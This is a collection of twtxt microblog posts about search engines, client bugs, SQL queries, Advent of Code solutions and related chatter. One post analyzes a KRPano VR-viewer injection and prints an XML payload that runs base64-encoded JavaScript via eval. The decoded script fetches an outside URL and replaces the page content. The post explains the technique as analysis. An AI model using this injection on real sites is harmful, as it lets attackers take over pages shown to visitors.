About ChatGPT rotting people’s brains, similarly could be said about search engines, and reference books. Oh, also doom scrolling, and mobile devices, and the Internet… :-P
@movq@www.uninformativ.de A quick search revealed https://www.tux-onlineshop.de/plueschtiere next door to you, but these tuxes look rather ugly. Also, shipping to the US&A is 60 bucks. I bet @kat@yarn.girlonthemoon.xyz’s sister can do better. :-)
Farrrk me Google search is and these days. Will they please “fuck off” with this Gemini AI garbage at the top that takes forever and is distracting as shit™ 💩 Fark me 🤦♂️ #Google #Search #Sucks #AI #Gemini
tar
and find
were written by the devil to make sysadmins even more miserable
@movq@www.uninformativ.de Yeah I actually use sift a lot these days for most “searching” – at least code and text searching. For finding files by name I still use find | grep
.
@bender@twtxt.net Yes, you right. But is premium for more than that.
I use a feature I love a lot: customising different searches with different themes or links.
It’s easy to understand with an example. I have a search with the name “Django”. I set sources: Django documentation, stack overflow, topic “programming” and so on. It’s very quick to find Django solutions.
I also have another way to find my stuff: search my blog and repositories.
I had problems paying for the first mouths, now it’s a working tool for me.
@andros@twtxt.andros.dev what makes Kagi “the best search engine”? It is premium, alright. Allegedly you don’t get ads, but pay up-front for it, monthly.
I am very agree with the article. For me, Kagi is the best search engine. A premium experience.
@thecanine@twtxt.net Yeah this is where I think all the hype really falls down. It’s all just a really really expensive search engine and auto-complete 🤦♂️ That’s it!
I just fixed a bug in tt’s reply to parent feature. Previously, when the message tree looked like the following
Message
├╴Reply 1
│ └╴Subreply
└╴Reply 2
and “Reply 2” was selected, pressing A
to reply to the parent should have picked “Message”. However, a reply to “Reply 2” was composed instead. The reason was a precausiously introduced safety guard to abort the parent search which stopped at “Subreply”, because its subject didn’t match “Reply 2”’s. It was originally intended to abort on a completely different message conversation root. Just in case. Turns out that this thoght was flawed.
Fixing bugs by only removing code is always cool. :-)
/ME slipping a note under @klaxzy@klaxzy.net’s keyboard.
Note: “You should check https://marginalia-search.com/ I bet you’ll love it.”
Hmmm there’s a bug somewhere in the way I’m ingesting archived feeds 🤔
sqlite> select * from twts where content like 'The web is such garbage these days%';
hash = 37sjhla
feed_url = https://twtxt.net/user/prologic/twtxt.txt/1
content = The web is such garbage these days 😔 Or is it the garbage search engines? 🤔
created = 2024-11-14T01:53:46Z
created_dt = 2024-11-14 01:53:46
subject = #37sjhla
mentions = []
tags = []
links = []
sqlite>
Timeline of Evolution of Twtxt/Yarn.social:
- 2016 – Twtxt created by John Downey: plain text + HTTP = minimalist microblogging
- 2017–2019 – Community builds CLI tools, but adoption remains niche
- 2020 – Yarn.social launched by @prologic@twtxt.net with federation, threading, UI
- 2021–2023 – Pods sync, user mentions, blocking, search, and media support added
- 2024+ – Yarn.social becomes the reference Twtxt platform, with active federated pods
Dam the search here is sooo good now 😅
Anyway. this was a good use for search btw. I couldn’t find my Twt, so I just quickly searched for it, snap, bingo I found it in a snap! 🫰
@prologic@twtxt.net, from IRC:
- Saving preferences is failing. Specifically trying to save “Open Links” on the same window. For sure it isn’t happening. Check errors on browser’s console.
- Search results pagination is broken. Search for “twtxt.net” and see it. Also, picking oldest/newest makes no difference on that search query.
@prologic@twtxt.net I can live without highlights. Actually, I prefer not to have them. A good search is all I want.
Search syntax appears to be:
hello
"hello world"
hello AND world
hello OR world
hello NOT world
"this is a phrase"
@prologic@twtxt.net pretty neat, search actually works now!
@lyse@lyse.isobeef.org I’m open to other suggestions 🤣 But hopefully both adding the additional prompt, not allowing it to enter shell history and removing from my shell history prevents me from doing such silly things in haste by pressing ^R
and using fuzzy search which if you type fast you sometimes get wrong 😑
FYI: I’ve re-opened up search for anonymous use. So things like this now work without having to have an account on this pod or login. 👌 #search #twtxt
@prologic@twtxt.net If it develops, and I’m not saying it will happen soon, perhaps Yarn could be connected as an additional node. Implementation would not be difficult for any client or software. It will not only be a backup of twtxt, but it will be the source for search, discovery and network health.
looks good to me!
About alice’s hash, using SHA256, I get 96473b4f
or 96473B4F
for the last 8 characters. I’ll add it as an implementation example.
The idea of including it besides the follow URL is to avoid calculating it every time we load the file (assuming the client did that correctly), and helps to track replies across the file with a simple search.
Also, watching your example I’m thinking now that instead of {url=96473B4F,id=1}
which is ambiguous of which URL we are referring to, it could be something like:
{reply_to=[URL_HASH]_[TWT_ID]}
/ {reply_to=96473B4F_1}
That way, the ‘full twt ID’ could be 96473B4F_1
.
@prologic@twtxt.net Of course you don’t notice it when yarnd only shows at most the last n messages of a feed. As an example, check out mckinley’s message from 2023-01-09T22:42:37Z. It has “[Scheduled][Scheduled][Scheduled]“… in it. This text in square brackets is repeated numerous times. If you search his feed for closing square bracket followed by an opening square bracket (][
) you will find a bunch more of these. It goes without question he never typed that in his feed. My client saves each twt hash I’ve explicitly marked read. A few days ago, I got plenty of apparently years old, yet suddenly unread messages. Each and every single one of them containing this repeated bracketed text thing. The only conclusion is that something messed up the feed again.
@prologic@twtxt.net @xuu@txt.sour.is There:
Just search for ][
in https://twtxt.net/user/mckinley/twtxt.txt and you’ll see.
Well, that’s another bug: The search https://twtxt.net/search?q=%22LOOOOL%2C+great+programming+tutorial+music%22 yields the wrong hash. It should have been poyndha instead.
Reading “Man’s search for meaning” by Viktor E. Frankl
@slashdot@feeds.twtxt.net Who the F+++ still uses goo’s search engine anyway xD Shout out to all my homies hosting a Searx instance 😂🤘
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml
parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
nice! would you mind elaborating a bit?
Is that the scientific method?
I couldn’t find anything related when I searched for it.
@andros@twtxt.andros.dev Sorry I missed your messages to #twtxt on IRC. There are people there, but it can take several hours to get a response. E.g. I check it every day or two. I recommend using an IRC bouncer. To answer your question about registries, I used a couple of registries when I first started out, to try to find feeds to follow, but haven’t since then. I don’t remember which ones, but they were easy to find with web searches.
@prologic@twtxt.net Is it possible to interact with twtxt.net from outside? For example, an search API
Remembered about one ISP which disallow IRC stuff on his servers. By searching i found what it’s many ISP’s which equals IRC to proxy and doorways. This is unfair!
@Codebuzz@www.codebuzz.nl I have separate mail boxes for private and work, but flattened both to have a simpler structure. For work, where we use Outlook, I am using categories for organising the mails and privately I am using Vivaldi’s labels system. The main idea is to use search and grouping through dynamic saved searches instead of static folders.
So I’ve flattened my work and private email inboxes to single inbox folders and I don’t even know anymore what I was thinking before trying frantically to organise everything in sub folders. Labels and search filters are the way forward.
I share I did write up an algorithm for it at some point I think it is lost in a git comment someplace. I’ll put together a pseudo/go code this week.
Super simple:
Making a reply:
- If yarn has one use that. (Maybe do collision check?)
- Make hash of twt raw no truncation.
- Check local cache for shortest without collision
- in SQL:
select len(subject) where head_full_hash like subject || '%'
- in SQL:
Threading:
- Get full hash of head twt
- Search for twts
- in SQL:
head_full_hash like subject || '%' and created_on > head_timestamp
- in SQL:
The assumption being replies will be for the most recent head. If replying to an older one it will use a longer hash.
Diving into mblaze, I think I’ve nearly* reached peek email geek.
Just a bunch of shell commands I can pipe together to search, list, view and reply to email (after syncing it to a local Maildir).
EXAMPLES at https://git.vuxu.org/mblaze/tree/README
So far I’m using most of the tools directly from the command line, but I might take inspiration from https://sr.ht/~rakoo/omail/ to make my workflow a bit more efficient.
*To get any closer, I think I’d have to hand-craft my own SMTP client or something.
@movq@www.uninformativ.de Yes, the tools are surprisingly fast. Still, magrep takes about 20 seconds to search through my archive of 140K emails, so to speed things up I would probably combine it with an indexer like mu, mairix or notmuch.
@falsifian@www.falsifian.org comments on the feeds as in nick
, url
, follow
, that kind of thing? If that, then not interested at all. I envision an archive that would allow searching, and potentially browsing threads on a nice, neat interface. You will have to think, though, on other things. Like, what to do with images? Yarn allows users to upload images, but also embed it in twtxts from other sources (hotlinking, actually).
@prologic@twtxt.net I believe you when you say registries as designed today do not crawl. But when I first read the spec, it conjured in my mind a search engine. Now I don’t know how things work out in practice, but just based on reading, I don’t see why it can’t be an API for a crawling search engine. (In fact I don’t see anything in the spec indicating registry servers shouldn’t crawl.)
(I also noticed that https://twtxt.readthedocs.io/en/latest/user/registry.html recommends “The registries should sync each others user list by using the users endpoint”. If I understood that right, registering with one should be enough to appear on others, even if they don’t crawl.)
Does yarnd provide an API for finding twts? Is it similar?
@prologic@twtxt.net I guess I thought they were search engines. Anyway, the registry API looks like a decent one for searching for tweets. Could/should yarn.social pods implement the same API?
@prologic@twtxt.net What’s the difference between search.twtxt.net and the /api/plain/tweets endpoint of a registry? In my mind, a registry is a twtxt search engine. Or are registries not supposed to do their own crawling to discover new feeds?
Never mind, I simply searched and deleted them all (D
then ~f sender
). :-) Phew!
Have not tried any of them, but some of these seem to fit the bill:
Added support for #tag clouds and #search to timeline. Based on code from @dfaria.eu@dfaria.eu🙏
Live at: http://darch.dk/timeline/?profile=https://darch.dk/twtxt.txt
So, I finally got day 17 to under a second on my machine. (in the test runner it takes 10)
I implemented a Fibonacci Heap to replace the priority queue to great success.
https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go#L168-L268
OH MY FREAKING HECK. So.. I made my pather able to run as Dijkstra or A* if the interface includes a heuristic.. when i tried without the heuristic it finished faster :|
So now to figure out why its not working right.
man… day17 has been a struggle for me.. i have managed to implement A* but the solve still takes about 2 minutes for me.. not sure how some are able to get it under 10 seconds.
Solution: https://git.sour.is/xuu/advent-of-code/src/branch/main/day17/main.go
A* PathFind: https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go
some seem to simplify the seen check to only be horizontal/vertical instead of each direction.. but it doesn’t give me the right answer
The word forms is part two. In this one you want to find the first digit and last digit. Think searching ‘1’ - ‘9’
I could have made my search smarter using a prefix search rather than scanning the full buffer for each iteration.
An official FBI document dated January 2021, obtained by the American association “Property of People” through the Freedom of Information Act.
This document summarizes the possibilities for legal access to data from nine instant messaging services: iMessage, Line, Signal, Telegram, Threema, Viber, WeChat, WhatsApp and Wickr. For each software, different judicial methods are explored, such as subpoena, search warrant, active collection of communications metadata (“Pen Register”) or connection data retention law (“18 USC§2703”). Here, in essence, is the information the FBI says it can retrieve:
Apple iMessage: basic subscriber data; in the case of an iPhone user, investigators may be able to get their hands on message content if the user uses iCloud to synchronize iMessage messages or to back up data on their phone.
Line: account data (image, username, e-mail address, phone number, Line ID, creation date, usage data, etc.); if the user has not activated end-to-end encryption, investigators can retrieve the texts of exchanges over a seven-day period, but not other data (audio, video, images, location).
Signal: date and time of account creation and date of last connection.
Telegram: IP address and phone number for investigations into confirmed terrorists, otherwise nothing.
Threema: cryptographic fingerprint of phone number and e-mail address, push service tokens if used, public key, account creation date, last connection date.
Viber: account data and IP address used to create the account; investigators can also access message history (date, time, source, destination).
WeChat: basic data such as name, phone number, e-mail and IP address, but only for non-Chinese users.
WhatsApp: the targeted person’s basic data, address book and contacts who have the targeted person in their address book; it is possible to collect message metadata in real time (“Pen Register”); message content can be retrieved via iCloud backups.
Wickr: Date and time of account creation, types of terminal on which the application is installed, date of last connection, number of messages exchanged, external identifiers associated with the account (e-mail addresses, telephone numbers), avatar image, data linked to adding or deleting.
TL;DR Signal is the messaging system that provides the least information to investigators.
@prologic@twtxt.net The hackathon project that I did recently used openai and embedded the response info into the prompt. So basically i would search for the top 3 most relevant search results to feed into the prompt and the AI would summarize to answer their question.
@prologic@twtxt.net I get the worry of privacy. But I think there is some value in the data being collected. Do I think that Russ is up there scheming new ways to discover what packages you use in internal projects for targeting ads?? Probably not.
Go has always been driven by usage data. Look at modules. There was need for having repeatable builds so various package tool chains were made and evolved into what we have today. Generics took time and seeing pain points where they would provide value. They weren’t done just so it could be checked off on a box of features. Some languages seem to do that to the extreme.
Whenever changes are made to the language there are extensive searches across public modules for where the change might cause issues or could be improved with the change. The fs embed and strings.Cut come to mind.
I think its good that the language maintainers are using what metrics they have to guide where to focus time and energy. Some of the other languages could use it. So time and effort isn’t wasted in maintaining something that has little impact.
The economics of the “spying” are to improve the product and ecosystem. Is it “spying” when a municipality uses water usage metrics in neighborhoods to forecast need of new water projects? Or is it to discover your shower habits for nefarious reasons?
how install gomodot? also.. @prologic@twtxt.net your domain has some pretty strong SEO mojo searching for install "gomodot"
puts you on the google first page.
@prologic@twtxt.net, search for “quark” and you will get quack, quart, quirk, and all possible iterations. Not too helpful.
Maybe just not have your search space contain Turing complete elements?
@prologic@twtxt.net let us take the path of less resistance, that is, less effort, for now. I am going to be a great-grandfather before search ever get implemented locally, least one to search on “all pods”. In other words, let us don’t bite more than we can chew. 😹 Neep-gren!
@fastidious@arrakis.netbros.com, I am sure profit—or the search for it—was involved. Most likely that pilot was a Ferengi in disguise. We are known to visit lesser planets seeking to exploit. Sometimes it works out, sometimes it doesn’t. Hoping my fellow Ferengi fares well or, at the very least, lets me know where his Latinum is.
@prologic@twtxt.net Yeah like normally I’m just a little annoyed and just say “whatever” and shrug it off, but come on I am searching for emojis here. Do you really need to harvest my user data for what is essentially a fuzzy search in the Unicode table?
Is it me, or Gmail’s web interface is going down the drain? Using Safari—my default browser—often takes two, or three clicks to open an email. If it weren’t because its search is amazing, I would never visit its web interface.
@eldersnake@yarn.andrewjvpowell.com
Google or (insert your favourite search engine here) have never let me down. Also, Youtube has repair guides, and HOWTOs for just about anything, and everything.
@movq@www.uninformativ.de
Do I need to do a search and replace on my feed to fix old entries? Thanks for quick fix!
@adi@f.adi.onl Yes, it did—at least I don’t see the same issue as before on twtxt.net. Weird, as it was never an issue on other pods. 🤷🏻♂️
Switching search engines today from DuckDuckGo to Ecosia as ClimateChange has a higher prio than our privacy.
”@niplav (#kfgri5a) There are no expectations when you’re honest. Expectations and honesty don’t mix.” -> I honestly wasn’t expecting that answer :)
@jlj@twt.nfld.uk “@niplav (#xvbnyma) Fascinating. :-) Suspect #RMS would have a violent physical reaction – accompanied by some salty language – after even a moment’s contemplation of life under such complicity. :-D” -> He is a very unreasonable man <3
@prologic@twtxt.net @anth Sounds like a good idea. The hash to conv/search url should stay local to a pod.
@jlj@twt.nfld.uk “@niplav (#4qeibma) Hadn’t heard of this; thanks for the tip! Been getting lost in your text reviews; the Benatar piece piqued my interest: I’d been reading a critique of his earlier work – in Overall’s Why Have Children? – that really wasn’t up to scratch. Now I’m reading about pure replicators, which is a new concept, to me. :-)” -> Nice :-) Looking over my text reviews, they’re not quite finished (especially the Benatar one), so take it with a grain of salt
@prologic@twtxt.net would that need a NLP library? The lang would be great for a search engine to find language prefs.
@prologic@twtxt.net as promised! https://github.com/JonLundy/twtxt/blob/xuu/integrate-lextwt/types/lextwt/lextwt_test.go#
the lexer is nearing completion.. the tough part left is rooting out all the formatting code.
Project idea: search for books that are most effective at converting people from one ideology to another, for any two ideologies.
@prologic@twtxt.net I have some ideas to improve on twtxt. figure I can contribute some. 😁 bit more work and it will almost be a drop in replacement for ParseFile
Kinda wish types.Twt was an interface. it’s sooo close.
@xuu@txt.sour.is Not too happy with WKD’s use of CNAME over SRV for discovery of openpgpkey.. That breaks using SNI pretty quick. I suppose it was setup as a temporary workaround anyhow in the RFC..
Another cool advantage of keeping everything in text files is how fast the search indexer of operating systems gives you results.
built a little script for looking up IDs in twtxt tweets: !twtxt_search. Going to use it as a way to look up and reference specific tweets in my wiki.
It turns out that fts5 is enabled by default on SQLite! My twtxt2sqlite generator has been updated to use fts5. Now I can do full text search on all my twtxt tweets. I have implemented a related-tweets box in the !twtxt_playground as a proof-of-concept. More info on fts5 can be found at [[https://www.sqlite.org/fts5.html]].
/meta @ckipp@chronica.xyz Also yes, a simple string search would be fine. I’m not JS-savvy enough to be sure, but I guess it would work a bit like tags?
/meta @ckipp@chronica.xyz Regarding potential new features, maybe some kind of search box? And is there a way to embed images or other media?